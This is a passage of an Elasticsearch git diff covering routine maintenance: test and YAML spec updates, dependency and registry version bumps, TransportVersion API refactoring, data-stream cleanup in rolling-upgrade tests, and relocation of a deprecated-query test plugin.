foo: [1.1, 5.5] + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: 1.1 5.5 + + - match: { "hits.total.value": 0 } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml index 729f284bde95f..ca399ab3e4c7c 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml @@ -45,7 +45,7 @@ setup: catch: /\[duration\] must be positive[:] \[-1\]/ ml.forecast: job_id: "forecast-job" - duration: "-1s" + duration: "-1" --- "Test forecast given duration is too large": @@ -61,7 +61,7 @@ setup: catch: /\[expires_in\] must be non-negative[:] \[-1\]/ ml.forecast: job_id: "forecast-job" - expires_in: "-1s" + expires_in: "-1" --- "Test forecast given max_model_memory is too large": - do: diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml index 2d440f1cf5987..408ddd1ec50c6 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml @@ -944,7 +944,7 @@ teardown: {"index": { "_id": "11" }} {"content_embedding":{"is": 0.6, "pugs": 0.6 }} {"index": { "_id": "12" }} - {"content_embedding":{"is": 0.1891394, "pugs": 0.1 }} + {"content_embedding":{"cats": 0.1 }} - do: search: @@ -955,13 +955,25 @@ teardown: field: content_embedding query_vector: pugs: 0.5 - cats: 0.5 - is: 0.04600334 + cats: 0.18 + is: 0.2 - match: { hits.total.value: 2 } - match: { hits.hits.0._id: "11" } - match: { hits.hits.1._id: "12" } + - do: + search: + index: test-sparse-vector-pruning-default + body: + query: + sparse_vector: + field: content_embedding + query_vector: + is: 0.21 # 0.2 is the weight threshold for the default pruning config + + - match: { hits.total.value: 11 } + - do: search: index: test-sparse-vector-pruning-default diff --git a/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java b/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java index a2f8dd91176e2..384c06ec0850d 100644 --- a/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java +++ b/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java @@ -37,7 +37,7 @@ public class StackTemplateRegistry extends IndexTemplateRegistry { // The stack template registry version. This number must be incremented when we make changes // to built-in templates. 
- public static final int REGISTRY_VERSION = 16; + public static final int REGISTRY_VERSION = 18; public static final String TEMPLATE_VERSION_VARIABLE = "xpack.stack.template.version"; public static final Setting<Boolean> STACK_TEMPLATES_ENABLED = Setting.boolSetting( diff --git a/x-pack/plugin/watcher/build.gradle b/x-pack/plugin/watcher/build.gradle index ce7c8e5d6311a..f541ca4be58c5 100644 --- a/x-pack/plugin/watcher/build.gradle +++ b/x-pack/plugin/watcher/build.gradle @@ -34,7 +34,7 @@ dependencies { api 'com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer:20211018.2' runtimeOnly 'com.google.guava:guava:32.0.1-jre' // needed by watcher for the html sanitizer runtimeOnly 'com.google.guava:failureaccess:1.0.1' - api 'com.sun.mail:jakarta.mail:1.6.4' + api 'com.sun.mail:jakarta.mail:1.6.8' api 'com.sun.activation:jakarta.activation:1.2.1' compileOnly "org.apache.httpcomponents:httpclient:${versions.httpclient}" compileOnly "org.apache.httpcomponents:httpcore:${versions.httpcore}" diff --git a/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java b/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java index f3b75273b2860..fed491c3a008d 100644 --- a/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java +++ b/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java @@ -239,7 +239,7 @@ public void testInitialRequestContainsInvalidPayload() throws Exception { XContentParseException.class, () -> reportingAttachmentParser.toAttachment(createWatchExecutionContext(), Payload.EMPTY, attachment) ); - assertThat(e.getMessage(), containsString("Unexpected end-of-input")); + assertThat(e.getMessage(), containsString("Unexpected end of file")); } public void testInitialRequestContainsPathAsObject() throws Exception { diff --git a/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java b/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java index 6cb3a37920eb0..26bf25bf8c82b 100644 --- a/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java +++ b/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java @@ -194,6 +194,7 @@ private void setUpDataStreamWriteDocsAndRollover(String dataStreamName, Settings assertAcked(indicesAdmin().rolloverIndex(new RolloverRequest(dataStreamName, null)).actionGet()); } + ensureGreen(); } static void indexDocs(String dataStream, int numDocs) { diff --git a/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle b/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle index f064c97ff296e..ca6cb356bc1ce 100644 --- a/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle +++ b/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle @@ -28,7 +28,7 @@ dependencies { clusterModules project(xpackModule('mapper-constant-keyword')) clusterModules project(xpackModule('wildcard')) clusterModules project(':test:external-modules:test-multi-project') - restTestConfig
project(path: ':modules:data-streams', configuration: "basicRestSpecs") + restTestConfig project(path: ':modules:data-streams', configuration: "restTests") restTestConfig project(path: ':modules:ingest-common', configuration: "basicRestSpecs") restTestConfig project(path: ':modules:reindex', configuration: "basicRestSpecs") restTestConfig project(path: ':modules:streams', configuration: "basicRestSpecs") diff --git a/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java b/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java index 0977eaddd7e06..a5581ef922736 100644 --- a/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java +++ b/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java @@ -20,6 +20,8 @@ import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; import org.junit.ClassRule; +import java.util.Objects; + @TimeoutSuite(millis = 60 * TimeUnits.MINUTE) public class XpackWithMultipleProjectsClientYamlTestSuiteIT extends MultipleProjectsClientYamlSuiteTestCase { @ClassRule @@ -30,7 +32,7 @@ public class XpackWithMultipleProjectsClientYamlTestSuiteIT extends MultipleProj .setting("xpack.ml.enabled", "true") .setting("xpack.security.enabled", "true") .setting("xpack.watcher.enabled", "false") - .setting("xpack.license.self_generated.type", "trial") + // Integration tests are supposed to enable/disable exporters before/after each test .setting("xpack.security.authc.token.enabled", "true") .setting("xpack.security.authc.api_key.enabled", "true") .setting("xpack.security.transport.ssl.enabled", "true") @@ -38,12 +40,20 @@ public class XpackWithMultipleProjectsClientYamlTestSuiteIT extends MultipleProj .setting("xpack.security.transport.ssl.certificate", "testnode.crt") .setting("xpack.security.transport.ssl.verification_mode", "certificate") .setting("xpack.security.audit.enabled", "true") + .setting("xpack.license.self_generated.type", "trial") + // disable ILM history, since it disturbs tests using _all + .setting("indices.lifecycle.history_index_enabled", "false") .keystore("xpack.security.transport.ssl.secure_key_passphrase", "testnode") .configFile("testnode.pem", Resource.fromClasspath("/org/elasticsearch/xpack/security/transport/ssl/certs/simple/testnode.pem")) .configFile("testnode.crt", Resource.fromClasspath("/org/elasticsearch/xpack/security/transport/ssl/certs/simple/testnode.crt")) .configFile("service_tokens", Resource.fromClasspath("service_tokens")) .user(USER, PASS) .feature(FeatureFlag.TIME_SERIES_MODE) + .feature(FeatureFlag.SUB_OBJECTS_AUTO_ENABLED) + .systemProperty("es.queryable_built_in_roles_enabled", () -> { + final String enabled = System.getProperty("es.queryable_built_in_roles_enabled"); + return Objects.requireNonNullElse(enabled, ""); + }) .build(); public XpackWithMultipleProjectsClientYamlTestSuiteIT(@Name("yaml") ClientYamlTestCandidate testCandidate) { diff --git a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java index 
4d4b04456ec2a..3ed2a68d0129e 100644 --- a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java +++ b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java @@ -11,7 +11,6 @@ import org.apache.http.client.methods.HttpGet; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.client.Request; import org.elasticsearch.client.RequestOptions; @@ -329,10 +328,10 @@ boolean nodeSupportApiKeyRemoteIndices(Map<String, Object> nodeDetails) { TransportVersion transportVersion = getTransportVersionWithFallback( nodeVersionString, nodeDetails.get("transport_version"), - () -> TransportVersions.ZERO + () -> TransportVersion.zero() ); - if (transportVersion.equals(TransportVersions.ZERO)) { + if (transportVersion.equals(TransportVersion.zero())) { // In cases where we were not able to find a TransportVersion, a pre-8.8.0 node answered about a newer (upgraded) node. // In that case, the node will be current (upgraded), and remote indices are supported for sure. var nodeIsCurrent = nodeVersionString.equals(Build.current().version()); diff --git a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java index 1eff5c49dadc0..9242f5a9b5156 100644 --- a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java +++ b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java @@ -216,6 +216,9 @@ public void testUpgradeDataStream() throws Exception { if (ilmEnabled) { checkILMPhase(dataStreamName, upgradedIndicesMetadata); + // Delete the data streams to avoid ILM continuously running cluster state tasks, see + // https://github.com/elastic/elasticsearch/issues/129097#issuecomment-3016122739 + deleteDataStream(dataStreamName); } else { compareIndexMetadata(oldIndicesMetadata, upgradedIndicesMetadata); } @@ -227,7 +230,7 @@ public void testMigrateDoesNotRestartOnUpgrade() throws Exception { /* * This test makes sure that if reindex is run and completed, then when the cluster is upgraded the task * does not begin running again.
*/ - String dataStreamName = "reindex_test_data_stream_ugprade_test"; + String dataStreamName = "reindex_test_data_stream_upgrade_test"; int numRollovers = randomIntBetween(0, 5); boolean hasILMPolicy = randomBoolean(); boolean ilmEnabled = hasILMPolicy && randomBoolean(); @@ -237,6 +240,9 @@ public void testMigrateDoesNotRestartOnUpgrade() throws Exception { } else if (CLUSTER_TYPE == ClusterType.UPGRADED) { makeSureNoUpgrade(dataStreamName); cancelReindexTask(dataStreamName); + // Delete the data streams to avoid ILM continuously running cluster state tasks, see + // https://github.com/elastic/elasticsearch/issues/129097#issuecomment-3016122739 + deleteDataStream(dataStreamName); } else { makeSureNoUpgrade(dataStreamName); } @@ -650,7 +656,7 @@ private void upgradeDataStream( int expectedErrorCount, boolean ilmEnabled ) throws Exception { - Set<String> indicesNeedingUpgrade = getDataStreamIndices(dataStreamName); + List<String> indicesNeedingUpgrade = getDataStreamBackingIndexNames(dataStreamName); final int explicitRolloverOnNewClusterCount = randomIntBetween(0, 2); for (int i = 0; i < explicitRolloverOnNewClusterCount; i++) { String oldIndexName = rollover(dataStreamName); @@ -726,7 +732,7 @@ private void upgradeDataStream( } assertThat( statusResponseString, - getDataStreamIndices(dataStreamName).size(), + getDataStreamBackingIndexNames(dataStreamName).size(), equalTo(expectedTotalIndicesInDataStream) ); assertThat(statusResponseString, ((List) statusResponseMap.get("errors")).size(), equalTo(expectedErrorCount)); @@ -768,16 +774,6 @@ private void makeSureNoUpgrade(String dataStreamName) throws Exception { } } - @SuppressWarnings("unchecked") - private Set<String> getDataStreamIndices(String dataStreamName) throws IOException { - Response response = client().performRequest(new Request("GET", "_data_stream/" + dataStreamName)); - Map<String, Object> responseMap = XContentHelper.convertToMap(JsonXContent.jsonXContent, response.getEntity().getContent(), false); - List<Map<String, Object>> dataStreams = (List<Map<String, Object>>) responseMap.get("data_streams"); - Map<String, Object> dataStream = dataStreams.get(0); - List<Map<String, Object>> indices = (List<Map<String, Object>>) dataStream.get("indices"); - return indices.stream().map(index -> index.get("index_name").toString()).collect(Collectors.toSet()); - } - /* * Similar to isOriginalClusterCurrent, but returns true if the major versions of the clusters are the same. So true * for 8.6 and 8.17, but false for 7.17 and 8.18.
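The ApiKeyBackwardsCompatibilityIT hunk above and the RolesBackwardsCompatibilityIT hunk below share the same fallback idiom: when a node's transport version cannot be read from its node info, substitute the TransportVersion.zero() sentinel, and on seeing the sentinel decide from the node's build version instead. A self-contained sketch of that idiom; the Version record and the feature threshold are illustrative stand-ins, not the real Elasticsearch classes:

import java.util.function.Supplier;

class VersionFallbackSketch {
    // Illustrative stand-in for TransportVersion; only the zero() sentinel matters here.
    record Version(int id) {
        static Version zero() {
            return new Version(0);
        }
    }

    // Use the reported transport version when present, otherwise the fallback sentinel.
    static Version withFallback(Object reported, Supplier<Version> fallback) {
        return reported instanceof Integer id ? new Version(id) : fallback.get();
    }

    static boolean supportsFeature(Object reported, boolean nodeRunsCurrentBuild) {
        Version version = withFallback(reported, Version::zero);
        if (version.equals(Version.zero())) {
            // Unknown version: a pre-8.8.0 node answered about a newer (upgraded) node,
            // so that node must be current and the feature is supported for sure.
            return nodeRunsCurrentBuild;
        }
        return version.id() >= 8_080_099; // illustrative feature threshold, not a real constant
    }
}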
@@ -859,6 +855,10 @@ private void createRole(String name, String dataStream) throws IOException { assertOK(adminClient().performRequest(request)); } + private void deleteDataStream(String name) throws IOException { + client().performRequest(new Request("DELETE", "_data_stream/" + name)); + } + private RestClient getClient(String user, String passwd) throws IOException { RestClientBuilder builder = RestClient.builder(adminClient().getNodes().toArray(new Node[0])); String token = basicAuthHeaderValue(user, new SecureString(passwd.toCharArray())); diff --git a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java index 54b7ff6fa484c..c2d27b8cb5168 100644 --- a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java +++ b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java @@ -317,10 +317,10 @@ private boolean nodeSupportTransportVersion(Map<String, Object> nodeDetails, Tra TransportVersion nodeTransportVersion = getTransportVersionWithFallback( nodeVersionString, nodeDetails.get("transport_version"), - () -> TransportVersions.ZERO + () -> TransportVersion.zero() ); - if (nodeTransportVersion.equals(TransportVersions.ZERO)) { + if (nodeTransportVersion.equals(TransportVersion.zero())) { // In cases where we were not able to find a TransportVersion, a pre-8.8.0 node answered about a newer (upgraded) node. // In that case, the node will be current (upgraded), and remote indices are supported for sure. var nodeIsCurrent = nodeVersionString.equals(Build.current().version()); diff --git a/x-pack/qa/smoke-test-plugins-ssl/build.gradle b/x-pack/qa/smoke-test-plugins-ssl/build.gradle index cbd837fc2ccf6..03e67bdf0dd4b 100644 --- a/x-pack/qa/smoke-test-plugins-ssl/build.gradle +++ b/x-pack/qa/smoke-test-plugins-ssl/build.gradle @@ -83,6 +83,8 @@ testClusters.matching { it.name == "yamlRestTest" }.configureEach { user username: "test_user", password: "x-pack-test-password" user username: "monitoring_agent", password: "x-pack-test-password", role: "remote_monitoring_agent" + systemProperty 'es.queryable_built_in_roles_enabled', 'false' + pluginPaths.each { pluginPath -> plugin pluginPath } diff --git a/x-pack/rest-resources-zip/build.gradle b/x-pack/rest-resources-zip/build.gradle index 6cc39aa168e91..ab684c8b0c367 100644 --- a/x-pack/rest-resources-zip/build.gradle +++ b/x-pack/rest-resources-zip/build.gradle @@ -20,6 +20,7 @@ dependencies { freeTests project(path: ':rest-api-spec', configuration: 'restTests') freeTests project(path: ':modules:aggregations', configuration: 'restTests') freeTests project(path: ':modules:analysis-common', configuration: 'restTests') + freeTests project(path: ':modules:data-streams', configuration: 'restTests') freeTests project(path: ':modules:ingest-geoip', configuration: 'restTests') compatApis project(path: ':rest-api-spec', configuration: 'restCompatSpecs') compatApis project(path: ':x-pack:plugin', configuration: 'restCompatSpecs') @@ -28,6 +29,7 @@ dependencies { platinumTests project(path: ':x-pack:plugin:eql:qa:rest', configuration: 'restXpackTests') platinumTests project(path: ':x-pack:plugin:ent-search', configuration: 'restXpackTests') platinumTests project(path: ':x-pack:plugin:inference', configuration: 'restXpackTests') + platinumTests project(path: ':x-pack:plugin:watcher:qa:rest', configuration: 'restXpackTests')
@@ -57,6 +59,6 @@ def restResourcesZip = tasks.register('restResourcesZip', Zip) {
   }
 }
 
-artifacts {
-  archives restResourcesZip
+tasks.named('assemble').configure {
+  dependsOn restResourcesZip
 }
diff --git a/x-pack/plugin/enrich/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichIT.java b/x-pack/test/deprecated-query/build.gradle
similarity index 54%
rename from x-pack/plugin/enrich/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichIT.java
rename to x-pack/test/deprecated-query/build.gradle
index 981fe393edc5b..b0c14cd6b5d42 100644
--- a/x-pack/plugin/enrich/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichIT.java
+++ b/x-pack/test/deprecated-query/build.gradle
@@ -4,8 +4,11 @@
  * 2.0; you may not use this file except in compliance with the Elastic License
  * 2.0.
  */
-package org.elasticsearch.xpack.enrich;
 
-import org.elasticsearch.test.enrich.CommonEnrichRestTestCase;
+apply plugin: 'elasticsearch.base-internal-es-plugin'
 
-public class EnrichIT extends CommonEnrichRestTestCase {}
+esplugin {
+  name = 'x-pack-test-deprecated-query'
+  description = 'Deprecated query plugin'
+  classname = 'org.elasticsearch.query.DeprecatedQueryPlugin'
+}
diff --git a/x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java b/x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java
similarity index 96%
rename from x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java
rename to x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java
index 4250a64f8d407..480dce72d6bca 100644
--- a/x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java
+++ b/x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java
@@ -10,7 +10,6 @@
 import org.apache.lucene.search.MatchAllDocsQuery;
 import org.apache.lucene.search.Query;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.ParsingException;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
@@ -78,6 +77,6 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java b/x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java
similarity index 100%
rename from x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java
rename to x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java
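The deprecated-query test fixture moves out of the async-search QA project into a standalone x-pack/test/deprecated-query plugin so other suites can depend on it. For orientation, a sketch of how such a plugin typically registers its query with the search module; the SearchPlugin interface and QuerySpec are real extension points, while the NAME constant and fromXContent parser are assumed members of DeprecatedQueryBuilder:

    package org.elasticsearch.query;

    import java.util.List;

    import org.elasticsearch.plugins.Plugin;
    import org.elasticsearch.plugins.SearchPlugin;

    // Sketch of the plugin class named in the esplugin block above: registering the
    // query spec makes the deprecated query parseable and executable in tests.
    public class DeprecatedQueryPlugin extends Plugin implements SearchPlugin {
        @Override
        public List<QuerySpec<?>> getQueries() {
            return List.of(
                new QuerySpec<>(DeprecatedQueryBuilder.NAME, DeprecatedQueryBuilder::new, DeprecatedQueryBuilder::fromXContent)
            );
        }
    }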
diff --git a/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile b/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile
index 858038d483349..92cd2f46436db 100644
--- a/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile
+++ b/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile
@@ -1,5 +1,5 @@
 FROM c2id/c2id-server-demo:16.1.1 AS c2id
-FROM openjdk:21-jdk-buster
+FROM eclipse-temurin:17-noble
 
 # Using this to launch a fake server on container start; see `setup.sh`
 RUN apt-get update -qqy && apt-get install -qqy python3